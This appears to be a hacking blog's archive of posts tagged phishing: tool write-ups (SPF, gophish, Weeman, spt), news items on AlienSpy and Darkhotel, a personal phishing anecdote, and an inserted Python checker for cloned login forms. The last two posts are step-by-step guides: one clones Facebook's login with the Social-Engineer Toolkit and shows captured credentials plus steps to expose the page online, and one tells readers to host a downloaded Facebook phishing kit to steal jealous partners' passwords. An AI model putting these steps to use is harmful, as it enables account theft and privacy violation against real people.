Showing posts with the label phishing. Show all posts

SpeedPhishing Framework for Email Phishing

SPF (SpeedPhish Framework) is a Python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:

  • dnspython
  • twisted
  • PhantomJS

Usage:

    usage: spf.py [-h] [-f ] [-C ] [--all] [--test] [-e]
                  [-g] [-s] [--simulate] [-w] [-W] [-d ]
                  [-c ] [--ip ] [-v] [-y]

    optional arguments:
      -h, --help       show this help message and exit
      -d               domain name to phish
      -c               name of company to phish
      --ip             IP of webserver defaults to [192.168.1.124]
      -v, --verbosity  increase output verbosity

    input files:
      -f               file containing list of email addresses
      -C               config file

    enable flags:
      --all            enable ALL flags... same as (-e -g -s -w)
      --test           enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
      -e               enable external tool utilization
      -g               enable automated gathering of email targets
      -s               enable automated sending of phishing emails to targets
      --simulate       simulate the sending of phishing emails to targets
      -w               enable generation of phishing web sites
      -W               leave web server running after termination of spf.py

    misc:
      -y               automatically answer yes to all questions

Execution:

    cd spf
    python spf.py --test -d example.com

or to just test the websites:

    cd spf
    python web.py default.cfg

~ Friday, 13 May 2016 0 comments

Open-Source Phishing Framework: gophish

Gophish is a phishing framework that makes the simulation of real-world phishing attacks dead-simple. The idea behind gophish is simple – make industry-grade phishing training available to everyone.
“Available” in this case means two things –
  • Affordable – Gophish is currently open-source software that is completely free for anyone to use.
  • Accessible – Gophish is written in the Go programming language. This has the benefit that gophish releases are compiled binaries with no dependencies. In a nutshell, this makes installation as simple as “download and run”!

Let’s take a look at some of the features that really set gophish apart and make it awesome.

Hosted On-Prem

There are many commercial offerings that provide phishing simulation/training. Unfortunately, these are SaaS solutions that require you to hand over your data to someone else.
Gophish is different in that it is meant to be hosted in-house. This keeps your data where it belongs - with you.

Download -> Run


For the few in-house solutions that exist, setup can be a huge pain (looking at you, Ruby gems). Your time is too valuable to be spent wrestling with dependencies trying to create the perfect setup that somehow magically allows the program to run.

Gophish was written in the Go programming language for this exact reason. To install gophish, all you have to do is download the zip file, extract the contents, and run the binary.
By doing this, you just started two webservers, populated a database, and set up a background worker to handle sending the mails. Now, your time can be spent making campaigns. Easy peasy.


APIs for Everything.

Gophish was built with automation first. This means that you can create scripts and clients that automate all the hard work for you. In addition to this, we keep up-to-date API docs that describe each API endpoint in detail.


~ Thursday, 11 February 2016 0 comments

HTTP Server for phishing in Python

HTTP server for phishing in Python.

Usually you will want to run Weeman together with a DNS spoofing attack (see dsniff, ettercap).


Weeman will do the following steps:

  1. Create a fake HTML page.
  2. Wait for clients.
  3. Grab the data (POST).
  4. Try to log the client in to the original page.

Requirements

  • Python <= 2.7.
  • Python BeautifulSoup 4

Install Beautiful Soup

  • Archlinux - sudo pacman -S python2-beautifulsoup4
  • Ubuntu/Linuxmint - sudo apt-get install python-bs4
  • Fedora < 22 - sudo yum install python-beautifulsoup4
  • Fedora >= 22 - sudo dnf install python-beautifulsoup4
  • For another OS: - sudo pip install beautifulsoup4

Platforms

  • Linux (any)
  • Mac (Tested)
  • Windows (Not tested)
[!] If weeman runs on your platform (Windows), (or not), please let me know.

Usage

Just type help

Run server:

The settings will be saved for the next time you run weeman.py.

Get Weeman

            git clone git://github.com/Hypsurus/weeman

~ Saturday, 3 October 2015 0 comments

Simple Phishing Toolkit Rebirth

The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the undertrained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability.


INSTALLATION

The Basics

  1. Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
  2. Ensure you have PHP 5.4.
  3. Extract the spt files from the archive.
  4. Create a new directory on your web server, such as "spt" and upload the files to the directory.
     

Install spt

  1. Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
  2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
  3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
  4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
  5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
  6. If instead you see an error indicated, click the "
  7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
  8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "
  9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
  10. Now it's time to log in using the email address and password you entered in the previous step. See, that was easy!

~ Tuesday, 5 May 2015 0 comments

AlienSpy using Global Phishing Campaigns to target Consumers and Enterprises

AlienSpy, a remote access Trojan (RAT), is currently being used in global phishing campaigns to target both consumers and enterprises to steal valuable data and compromise systems.

Remote Access Trojans (RATs) are often recycled and redeveloped in the changing cybersecurity landscape. These kinds of Trojans are exploited through phishing campaigns which use flawed emails and malicious files to deliver malware payload to affect particular industries, consumers or businesses.


According to security firm Fidelis, the newly-discovered AlienSpy Trojan is currently being used in international phishing campaigns against both consumers and the enterprise, although it has generally been detected in campaigns based in the technology, finance, government and energy sectors.


AlienSpy currently supports infections on Windows, Linux, Mac OSX and the Android mobile operating system.

The Java-based Trojan gives an attacker full access to and control over a compromised system. The malware is able to collect system information including OS version, RAM data and computer name. It also uploads malware packages and captures webcam and microphone streams without consent.

The campaigns include njRAT, njWorm and Houdini RAT all of which are recognized to evolve in the nature of delivery rather than in core functionality.  The security firm believes the new RAT has benefited from "unified," collaborative development. As a result, the Trojan is more sophisticated and has expanded functionality.

"Applying this technique makes it very difficult for network defenders to detect the malicious activity from infected nodes in the enterprise. To prevent various security tools from running, this version of AlienSpy performs various registry key changes," the security firm said. "Infected systems could end up with botnet malware downloaded through AlienSpy RAT (e.g. Citadel) as it was observed by our security researchers during one of the infections."

AlienSpy's additional capabilities include a sandbox detection tool, the detection and disabling of antivirus software, and the use of Transport Layer Security (TLS) cryptographic protocols to secure its connection to the command and control (C&C) server.


~ Thursday, 9 April 2015 0 comments

Darkhotel Attackers Target CEOs

Hackers have developed a scheme to steal sensitive information from top executives by penetrating the Wi-Fi networks of luxury hotels, security researchers said Monday.



Dubbed the "Darkhotel APT," the threat actors use three different malware distribution methods, including malicious Wi-Fi networks, booby-trapped P2P torrents, and highly customized spear phishing, Kaspersky Lab noted in a research paper.





Kaspersky said about 90 percent of the infections appear to be located in Japan, Taiwan, China, Russia and South Korea, but that the executives targeted include those traveling from the United States and other countries.




"The more interesting traveling targets include top executives from the US and Asia doing business and investment in the (Asia-Pacific) region."



The attackers’ methods include the use of zero-day exploits to target executives in spear-phishing attacks as well as a kernel-mode keystroke logger to siphon data from victim machines. They also managed to crack weak digital signing keys to generate certificates for signing their malware, in order to make malicious files appear to be legitimate software. 



“Obviously, we’re not dealing with an average actor,” says Raiu. “This is a top-class threat actor. Their ability to do the kernel-mode key logger is rare, the reverse engineering of the certificate, the leveraging of zero days—that puts them in a special category.”



These types of attacks were first recorded in 2007, but activity spiked in August 2010 and has continued through to this year, the research found. Executives from electronics makers, pharmaceutical companies and military organizations were among the targets.



The key-logging tool's code is written in Korean, but Kaspersky said this did not necessarily mean the hackers were from Korea. It was also difficult at this stage in the investigation to tell if the attacks were state-backed, Raiu added.



The number of hotels that have been hit is also unknown. So far the researchers have found fewer than a dozen hotels with infection indicators. “Maybe there are some hotels that … used to be infected and we just cannot learn about that because there are no traces,” the network-management executive says.



The company worked with Kaspersky to scour all of the hotel servers it manages for any traces of malware and is “fairly confident that the malware doesn’t sit on any hotel server today.” But that is just one network-management company. Presumably, the DarkHotel operation is still active on other networks.


~ Wednesday, 12 November 2014 0 comments

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



How it started

Every day, I check my blogger dashboard to see if there are any new comments on my blog. This morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply



Looked fair enough. Out of curiosity I clicked the link and it took me to a Google Drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was HTTPS and Chrome verified the digital certificates to be that of Google. Faking this can be assumed to be next to impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe a million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a two-fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting, anti-viruses can be evaded. So after this, I went to the white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff). An expert analyzed my computer thoroughly via TeamViewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Received


He sent me some mails
He knew I found out the phishing page thing
He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17, he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. The latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google Drive, which has been discussed on The Hacker News. I will see if I can replicate an HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either way, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want its users' accounts to be compromised by any random kid with a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update: Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by Google). Google Drive, just like Dropbox, allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug.
Hacker's message on FB
After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

~ Friday, 20 June 2014 0 comments

Social Engineering Toolkit - Kali : Credential Harvester : Hack Facebook

Hacking Facebook

In the previous post I've discussed how not to hack Facebook. Here we will discuss how to hack Facebook. This tutorial is meant for enhancing your networking skills, as well as to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks. Don't use this information to hack someone's account, or you'll run the risk of getting into legal troubles. If you haven't yet read the previous post, you should. It might not be very enlightening in terms of technical details, but it is quite enjoyable and will provide you with a background of what we are looking at.

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That'll be me)
If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux

I don't feel the need to mention it, but I'll still do it. You need Kali Linux to proceed with this tutorial. Check out the top of the page and see the "Kali Linux complete" tutorial. Better yet, I'll link it here- Kali Linux : What it is and how to install

Se-toolkit

Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up

root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

                  _______________________________
                 /   _____/\_   _____/\__    ___/
                 \_____  \  |    __)_   |    |
                 /        \ |        \  |    |
                /_______  //_______  /  |____|
                        \/         \/          
  [---]        The Social-Engineer Toolkit (SET)         [---]      
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]                 Version: 4.3.9                   [---]
  [---]              Codename: 'Turbulence'              [---]
  [---]         Follow us on Twitter: @trustedsec        [---]
  [---]         Follow me on Twitter: @dave_rel1k        [---]
  [---]       Homepage: https://www.trustedsec.com       [---]
     Welcome to the Social-Engineer Toolkit (SET). The one
      stop shop for all of your social-engineering needs.
 
      Join us on irc.freenode.net in channel #setoolkit
  The Social-Engineer Toolkit is a product of TrustedSec.
           Visit: https://www.trustedsec.com
 Select from the menu:
   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit
set> 
Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

  • 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
  • The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
  • Then, the 3 selects Credential Harvester. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
Now you'll be seeing something like this-

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.
 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.
 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   1) Web Templates
   2) Site Cloner
   3) Custom Import
  99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP

On a new terminal type ifconfig. This will give you your IPv4 address, which is what you are looking for.


Back to se-toolkit

 Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/

Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.

Live demonstration

To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook, instead of homepage. It will be a tad bit different. Here is a screenshot of what I did.
The IP address is my internal address from ifconfig, which comes out to be 192.168.154.133. The cloned page is https://www.facebook.com/login.php. Now we will try to see if this credential harvester works.

On the Kali Linux Machine itself


Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32] "GET / HTTP/1.1" 200 -
Now if we enter something in the field, it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in username field and 'password' in password field. This is what se-toolkit shows-
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Also note that se-toolkit might keep dumping more stuff in the console, most of which is not important for the time being.

On Windows 8 machine (host)

Now I'm running Kali on a virtual machine. Windows 8 is the host machine, and we might want to check if it works on Windows 8. We would also like to see if modern browsers are able to observe anything wrong with the page, and if the firewall stops the data flow.
I entered windows8host and password2 and pressed the login button. This is what I got. Also, as I was logged in to Facebook with my personal account, the fake page redirected me to facebook.
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2

Conclusion : This method pretty much works well over LAN.
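Seen from the defender's side, the cloned page above has two observable properties: it is served from a host that is not the real login host, and its password form posts back to the harvester address rather than to the site it imitates. The Python check below is an added example, not part of the original post or of SET; the function names, the sample HTML and the allow-list are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hosts on which this login form is expected to live (assumption for the example).
EXPECTED_HOSTS = {"www.facebook.com"}

# Constructed samples: a clone that posts back to a LAN IP, and a same-origin form.
CLONE_HTML = ('<form action="http://192.168.154.133/" method="post">'
              '<input type="text" name="email">'
              '<input type="password" name="pass"></form>')
GENUINE_HTML = ('<form action="/login.php" method="post">'
                '<input type="text" name="email">'
                '<input type="password" name="pass"/></form>')


class LoginFormParser(HTMLParser):
    """Collect the action attribute of every form that holds a password input."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.action = ""
        self.has_password = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.flush_open_form()          # tolerate a missing </form>
            self.in_form = True
            self.action = attrs.get("action") or ""
            self.has_password = False
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.flush_open_form()

    def flush_open_form(self):
        if self.in_form and self.has_password:
            self.password_form_actions.append(self.action)
        self.in_form = False


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_login_page(page_url, html, expected_hosts):
    """Return findings for a page that asks for a password; [] means nothing flagged."""
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    parser.flush_open_form()
    if not parser.password_form_actions:
        return []                           # no password prompt, nothing to audit
    findings = []
    page_host = (urlsplit(page_url).hostname or "").lower()
    if page_host not in expected_hosts:
        findings.append("page-host-not-expected:" + page_host)
    if is_ip(page_host):
        findings.append("page-served-from-ip:" + page_host)
    for action in parser.password_form_actions:
        # An empty or relative action resolves against the page URL.
        target = urlsplit(urljoin(page_url, action))
        host = (target.hostname or "").lower()
        if host not in expected_hosts:
            findings.append("post-target-not-expected:" + host)
        if target.scheme != "https":
            findings.append("post-not-https:" + target.scheme)
    return findings


if __name__ == "__main__":
    print(audit_login_page("http://192.168.154.133/", CLONE_HTML, EXPECTED_HOSTS))
    print(audit_login_page("https://www.facebook.com/login.php", GENUINE_HTML, EXPECTED_HOSTS))
```

The same comparison of the page host against an exact allow-list is what catches a look-alike page served over valid HTTPS, where the certificate alone says nothing about who wrote the form.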

Make it work over internet

To make the technique work over internet, you will need to use your public IP instead of private. Search google for what is my IP to find your public IP. Then use it. You can use tinyurl or something to make the url appear legitimate. Also, port forwarding might need to be enabled, as your router might block traffic on port 80. Firewall can also cause troubles. While this tutorial was nothing more than - se-toolkit 1 2 3 [your IP] [facebook.com], the next post on getting your credential harvester on the internet will make the tutorial complete and useful in practical sense. Next tutorial will help you make your fake login page accessible over the internet. [Coming Soon] There you go - http://www.kalitutorials.net/2014/05/credential-harvestor-port-forwarding.html

~ Monday, 26 May 2014 0 comments

How To Hack Facebook Using Phishing Method



Lately, many Facebook users want to hack other Facebook users' accounts, especially jealous girlfriends or boyfriends. This method is quite easy and can get you a lot of emails and passwords.





Understanding the Attack Method

A phishing page is used to steal login credentials and other valuable information such as credit card details. A phishing page appears to be an exact copy of a legitimate page but it is coded for stealing.
   

Preparing the Weapons

1- First, download the files HERE 

2- You need to have a web hosting account. Just register yourself at any of free webhosting site. This is my suggestion :

  • 000webhost
  • 110mb
  • Ripway
  • SuperFreeHost
  • Freehostia
  • Freeweb7
  • t35
  • Awardspace
  • PHPNet
  • Free Web Hosting Pro
  • ProHosts
  • FreeZoka
  • AtSpace





As for me, I will use 000webhost, so firstly, go to the webpage and register yourself there. 

I suggest you choose a free subdomain. Just write the name of your website in the column. Your website name must be interesting, so that it attracts the victim. Fill in the forms, fill in the recaptcha given, agree to their terms of service and then click Create My Account.

A verification email will be sent to your email account. Verify and log in to your 000webhost account. Once you have logged in, you will see the list of your domains. Click Go To Cpanel.
Scroll down the page, you will see the File Manager. The icon is like this



Click your file manager, and you will be redirected here


After that, click public_html folder and you will see 2 files, such as default.php and .htaccess

Click Upload and you will get this


At here, 

Click choose file and browse for the FacebookPhishing.zip that you have downloaded.
Upload them. And you will get something like this



Now your phishing site is DONE! :)
Go to your site, and you will get a clone of Facebook login page :D




Attacking 

Now, what you need is to spread/send your phishing site link to your victims. Once they have logged in, a text file named pasu.txt will be generated. The victims' email and password will be there. Go to your file manager and check the text file. It would be something like this


Yeay! Now you have hacked a Facebook Account ^_^

That's all Phishing Tutorial from me. More Facebook hacking trick will be posted soon :)
Leave a comment if you have any query, or you can contact me on Facebook :)



~ Saturday, 21 December 2013 0 comments